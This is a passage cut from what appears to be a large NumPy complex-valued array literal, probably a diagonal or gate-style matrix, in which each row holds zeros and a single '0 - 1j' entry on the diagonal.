0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
